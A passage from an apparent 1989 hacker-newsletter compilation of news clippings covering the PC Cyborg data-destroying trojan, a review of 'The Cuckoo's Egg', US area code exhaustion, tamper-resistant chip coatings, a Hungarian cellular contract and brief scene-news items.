secret programs that later destroy data on the computer disk.
|
|
|
|
Paul Holbrook, a spokesman for the Computer Emergency Response Team, a U.S.
|
|
government-financed security organization in Pittsburgh, said his group had
|
|
confirmed the existence of the program, but did not know how widely it had
|
|
spread.
|
|
|
|
Trojan horses are programs hidden in software that secretly insert themselves
|
|
in a computer when the software masking them is activated. They are different
|
|
from other secret programs like viruses and worms because they are not
|
|
infectious: They do not automatically copy themselves.
|
|
|
|
A licensing agreement that accompanies the disk contains threatening
|
|
information.
|
|
|
|
It reads in part: "In case of your breach of this license, PC Cyborg reserves
|
|
the right to take any legal action necessary to recover any outstanding debts
|
|
payable to the PC Cyborg Corporation and to use program mechanisms to ensure
|
|
termination of your use of these programs. The mechanisms will adversely
|
|
affect other programs on your microcomputer."
|
|
|
|
When it destroys data, the program places a message on the screen that asks
|
|
users to send $387 to a Panama City address.
|
|
|
|
John McAfee, a computer security consultant in Santa Clara, California, said
|
|
the program had been mailed to people in England, West Germany, France and
|
|
Italy.
|
|
_______________________________________________________________________________
|
|
|
|
The Executive Computer: From Espionage To Using A Printer October 27, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
by Peter H. Lewis (New York Times)
|
|
|
|
Those executives who pay attention to computers are more likely to worry about
|
|
grand issues like productivity and small ones like how to make their personal
|
|
printers handle envelopes than whether the KGB has penetrated their companies.
|
|
In a fresh crop of books, they will find lessons on all these matters.
|
|
|
|
Perhaps the most entertaining of the new books is "The Cuckoo's Egg" ($19.95,
|
|
Doubleday), by Dr. Clifford Stoll, an astronomer.
|
|
|
|
Because he was the rookie in the Lawrence Berkeley Laboratories in California,
|
|
he was asked to track down and fix a glitch in the lab's accounting software,
|
|
which had found a 75-cent discrepancy when it tried to balance the books.
|
|
|
|
"First-degree robbery, huh?" was Stoll's first reaction. But by the time he
|
|
was done nearly a year later, he had uncovered a West German spy ring that had
|
|
cracked the security of American military and research computer networks,
|
|
gathering information that it sold to Moscow.
|
|
|
|
Beyond the entertainment value of this cat-and-mouse hunt, the book has lessons
|
|
for any corporate computer user. The message is clear: Most companies are
|
|
irresponsible about security.
|
|
|
|
The ease with which the "hacker" penetrated even military installations was
|
|
astonishing, but not as astonishing as the lack of concern by many of the
|
|
victims.
|
|
|
|
"The Cuckoo's Egg" follows the hunt for the unknown intruder, who steals
|
|
without taking and threatens lives without touching, using only a computer
|
|
keyboard and the telephone system.
|
|
|
|
The detective is an eccentric who sleeps under his desk, prefers bicycles to
|
|
cars, and suddenly finds himself working with the Federal Bureau of
|
|
Investigation, the Central Intelligence Agency and the National Security
|
|
Agency.
|
|
|
|
Although the criminal and the hunter deal in the esoteric realm of computer
|
|
code and data encryption, Stoll makes the technology accessible.
|
|
|
|
He also discovers that navigating the global electronic grid is less difficult
|
|
than navigating the bureaucracies of various government agencies.
|
|
|
|
And while he was a whiz at tracing the cuckoo's electronic tracks from Berkeley
|
|
to Okinawa to Hannover, West Germany, Stoll reveals himself to be helplessly
|
|
lost on streets and highways and befuddled by such appliances as a microwave
|
|
oven.
|
|
|
|
Besides the more than 30 academic, military and private government
|
|
installations that were easy prey for the spies, the victims included Unisys,
|
|
TRW, SRI International, the Mitre Corporation and Bolt Beranek & Newman Inc. --
|
|
some of the very companies that design, build and test computer systems for the
|
|
government.
|
|
|
|
"No doubt about it, the shoemaker's kids are running around barefoot," Stoll
|
|
writes.
|
|
|
|
One leading character in the book is Dr. Bob Morris, chief scientist for the
|
|
National Security Agency and the inventor of the security for the Unix
|
|
operating system.
|
|
|
|
An epilogue to the book, dealing with an unrelated computer crime, recounts the
|
|
discovery that it was Morris's son who wrote the rogue program that shut down a
|
|
national network for several days last year.
|
|
|
|
In "The Macintosh Way" ($19.95, Scott, Foresman & Co.), Guy Kawasaki, a former
|
|
Apple Computer Inc. executive who is now president of a software company, has
|
|
written a candid guide about management at high-technology companies.
|
|
|
|
Although his book is intended for those who make and market computer goods, it
|
|
could prove helpful to anyone who manages a business.
|
|
_______________________________________________________________________________
|
|
|
|
Dialing Away U.S. Area Codes November 13, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
by Laure O'Brien (Telephony Magazine)
|
|
|
|
The current endangered species in the news may not be an animal at all. The
|
|
number of available area codes in the United States is dwindling rapidly.
|
|
Chicago consumed a new code on November 11, 1989 and and New Jersey will gobble
|
|
up another one on January 1, 1990.
|
|
|
|
There are only nine codes left, and they are expected to be used up by 1995,
|
|
said Robert McAlesse, North American Numbering Plan administrator and member of
|
|
Bellcore's technical staff.
|
|
|
|
"In 1947 (Bellcore) started with 86 codes, and they projected exhaustion in 100
|
|
to 150 years. They were off by a few years," McAlesse said.
|
|
|
|
When the 152 available codes are exhausted, Bellcore will use a new plan for
|
|
creating area codes.
|
|
|
|
A total of 138 codes already are assigned. Five of the remaining 14 codes are
|
|
reserved for service access codes, and 9 are for geographic area codes.
|
|
|
|
Under the current plan, a 0 or a 1 is used as the second digit while the first
|
|
and last digits can range between 2 and 9. Under the new plan the first digit
|
|
will be between 2 and 9 and the following two digits will be numbers between 0
|
|
and 9, McAlesse said.
|
|
|
|
The new plan will create 640 potential area codes, he said. Bellcore isn't
|
|
predicting when the newly created codes will run out.
|
|
|
|
"The growth in new services and increase in the number of telephones are
|
|
exhausting the codes. The biggest increases are cellular telephones, pagers,
|
|
facsimile machines and new services that can have more than one number,"
|
|
McAlesse said.
|
|
|
|
The current unassigned codes include 210, 310, 410, 706, 810, 905, 909, 910 and
|
|
917. The Chicago area took the 708 code, and New Jersey will take 908.
|
|
|
|
In the Chicago metropolitan area, the suburbs were switched from the 312 area
|
|
code to the new 708 code. Residents and businesses within the city limits
|
|
retained the 312 code.
|
|
|
|
Illinois Bell started preparing for the change two years ago with the
|
|
announcements alerting business customers to change stationary and business
|
|
cards, said Gloria Pope, an Illinois Bell spokeswoman. Now the telco is
|
|
targeting the residential market with billboard reminders and billing inserts.
|
|
|
|
The cost of technically preparing for the new code, including labor, is
|
|
expected to reach $15 million. But Pope said that does not include mailings,
|
|
public relations efforts and business packages designed to smooth out the
|
|
transition. The telco will absorb the cost with budgeted funds, and no rate
|
|
increase is expected, she said.
|
|
|
|
Modifying the network to recognize the new code started about six months ago
|
|
with translation work. Every central office in the Chicago Metropolitan area
|
|
was adapted with a new foreign-area translator to accept the new code and route
|
|
the calls correctly, said Audrey Brooks, area manager-Chicago translations.
|
|
|
|
The long distance carriers were ready for the code's debut. AT&T, US Sprint
|
|
and MCI changed their computer systems to recognize the new code before the
|
|
Chicago deadline.
|
|
|
|
"We are anticipating a pretty smooth transfer," said Karen Rayl, U.S. Sprint
|
|
spokeswoman.
|
|
|
|
Businesses will need to adjust their PBX software, according to AT&T technical
|
|
specialist Craig Hoopman. "This could affect virtually every nationwide PBX,"
|
|
he said. Modern PBX's will take about 15 minutes to adjust while older
|
|
switches could take four hours. In many cases, customers can make the changes
|
|
themselves, he said.
|
|
_______________________________________________________________________________
|
|
|
|
A New Coating Thwarts Chip Pirates November 7, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
by John Markoff (New York Times)
|
|
|
|
Several years ago, clever high-technology pirates removed a chip from a
|
|
satellite-television descrambling device made by General Instrument
|
|
Corporation, electronically siphoned out hidden decryption software and studied
|
|
it to figure out a way to receive clear TV signals.
|
|
|
|
When the company later tried to protect the chips by coating them with epoxy,
|
|
the pirates simply developed a solvent to remove the protective seal, and stole
|
|
the software again.
|
|
|
|
Now government researchers at Lawrence Livermore National Laboratory, a weapons
|
|
and energy research center in Livermore, California, have developed a special
|
|
coating that protects the chip from attempts to pry out either the chip design
|
|
or the information it contains. In the semiconductor industry, a competitor's
|
|
chip design can be copied through a process called reverse engineering, which
|
|
might include determining the design through an electron microscope or by
|
|
dissolving successive layers of the chip with a solvent.
|
|
|
|
Already a number of government military and intelligence agencies are using the
|
|
coating to protect circuits containing secure information. The government has
|
|
qualified 13 U.S. chip makers to apply the coating to chips used by certain
|
|
government agencies.
|
|
|
|
The Lawrence Livermore research, known as the Connoisseur Project, has
|
|
developed a resin about the consistency of peanut butter that is injected into
|
|
the cavity surrounding the chip after it has been manufactured. The coating is
|
|
heated and cured; The chip is then sealed with a protective lid.
|
|
|
|
The special protective resin is opaque and resists solvents, heat, grinding and
|
|
other techniques that have been developed for reverse engineering.
|
|
|
|
A second-generation coating is being developed that will automatically destroy
|
|
the chip when an attempt is made chemically to break through the protective
|
|
layer.
|
|
|
|
Another project at the laboratory is exploring even more advanced protection
|
|
methods that will insert ultra-thin screens between the layers of a chip,
|
|
making it harder to be penetrated.
|
|
______________________________________________________________________________
|
|
|
|
U.S. Firm Gets Hungarian Telephone Contract December 5, 1989
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Taken from the St. Louis Post-Dispatch (via New York Times News Service)
|
|
|
|
U.S. West Inc., one of the seven regional Bell telephone companies, announced
|
|
that it had signed an agreement with Hungary to build a mobile cellular
|
|
telephone system in Budapest.
|
|
|
|
The Hungarian cellular system will be the first such telephone network in
|
|
Eastern Europe.
|
|
|
|
Because of the shortage of telephones in their country, Hungarians are expected
|
|
to use cellular telephones for basic home service, as well as mobile
|
|
communications.
|
|
|
|
For Hungary and the other Eastern European countries that have antiquated
|
|
telephone systems, it will be faster and cheaper for the Government to deliver
|
|
telephone service by cellular networks than it would be to rebuild the nation's
|
|
entire telephone apparatus.
|
|
|
|
A cellular telephone network transmits calls on radio waves to small receiving
|
|
antennas, called "cell" sites, that relay calls to local phone systems. The
|
|
system to be built in Hungary will transmit calls from cellular phone to
|
|
cellular phone and through the existing land-based telephone network.
|
|
|
|
The system, which is scheduled to begin operation in the first quarter of 1991,
|
|
will initially provide cellular communications to Budapest's 2.1 million
|
|
residents. Eventually, the system will serve all of Hungary, a nation of 10.6
|
|
million.
|
|
|
|
Hungary has 6.8 telephone lines for every 100 people, according to The World's
|
|
Telephones, a statistical compilation produced by AT&T. By comparison, the US
|
|
has 48.1 lines for every 100 people.
|
|
_____________________________________________________________________________
|
|
|
|
1. Phone Fun (November/December) -- Some students at Columbia University in
|
|
New York City have added a twist to that ancient annoyance, the chain
|
|
letter. The students have taken advantage of the school's newly installed,
|
|
$15 million IBM/Rolm phone system's ability not only to store messages like
|
|
an answering machine, but also to take and receive messages and send them
|
|
-- with comments -- to a third party.
|
|
|
|
Last spring, brothers Anil and Ajay Dubey, both seniors, recorded a parody
|
|
of rapper Tone Loc's Top 10 single "Funky Cold Medina" and sent it to some
|
|
buddies. Their friends then passed the recording along with comments, to
|
|
some other pals, who passed it on to other friends... and so on, and so
|
|
on, and so on. Eventually, the message ran more than ten minutes and
|
|
proved so popular that the phone mail system became overloaded and was
|
|
forced to shut down.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
2. Get a "Sprint" VISA Card Today (November 14, 1989) -- U.S. Sprint will
|
|
begin mailing in December, a a Sprint VISA card, which will combine the
|
|
functionality of a long distance calling card, a credit card and an ATM
|
|
card. Sprint will market the card which will be issued by State Street
|
|
Bank and Trust, in Boston.
|
|
|
|
Business travelers will receive a single bill that list all their travel
|
|
related expenses: Hotel, meals and phone calls. While payment for the
|
|
phone charges will be done through the regular Visa bill, call detail
|
|
reports will appear on Sprint's standard FONcard bill. Taken from
|
|
Communications Week.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
3. The Harpers Forum -- Harpers Magazine came up with an idea for how to
|
|
gather information about the phreak/hack modem community. They set up shop
|
|
on The Well (a public access Unix and bulletin board) and invited any and
|
|
all hackers to join in their multiple discussion subboards.
|
|
|
|
The hackers involved were Acid Phreak, Bernie S., Cap'n Crunch, Cheshire
|
|
Catalyst, Emmanuel Goldstein, Knight Lightning, Michael Synergy (of Reality
|
|
Hackers Magazine), Phiber Optik, Piper, Sir Francis Drake, Taran King, and
|
|
many old TAP subscribers.
|
|
|
|
The Well is accessible through CompuServe's data network. All charges for
|
|
using The Well by hackers were absorbed by Harpers.
|
|
|
|
There were many people on The Well posing as hackers to try and add to the
|
|
discussion, but it turns out that some of them like Adel Aide, were shoe
|
|
salesmen. There were also a few security types, including Clifford Stoll
|
|
(author of The Cuckoo's Egg), and a reporter or two like Katie Hafner (who
|
|
writes a lot for Business Week).
|
|
|
|
The contents of the discussion and all related materials will be used in an
|
|
article in an upcoming issue of Harpers Magazine.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
4. Phrozen Ghost has supposedly been arrested for crimes relating to hacking,
|
|
telecommunications fraud, and drugs. No other details are known at this
|
|
time. Information sent to PWN by Captain Crook.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
5. SurveillanceCon '89 -- Tuc, Susan Thunder, and Prime Suspect all attended a
|
|
Security/Surveillance Convention in Washington DC recently at which both
|
|
Tuc and Susan Thunder gave presentations about computer security. Tuc's
|
|
presentation dealt largely with bulletin boards like Ripco in Chicago and
|
|
newsletters like Phrack Inc. Audio cassettes from all the speakers at this
|
|
convention are available for $9.00 each, however we at PWN have no
|
|
information about who to contact to purchase these recordings.
|
|
_______________________________________________________________________________
|
|
|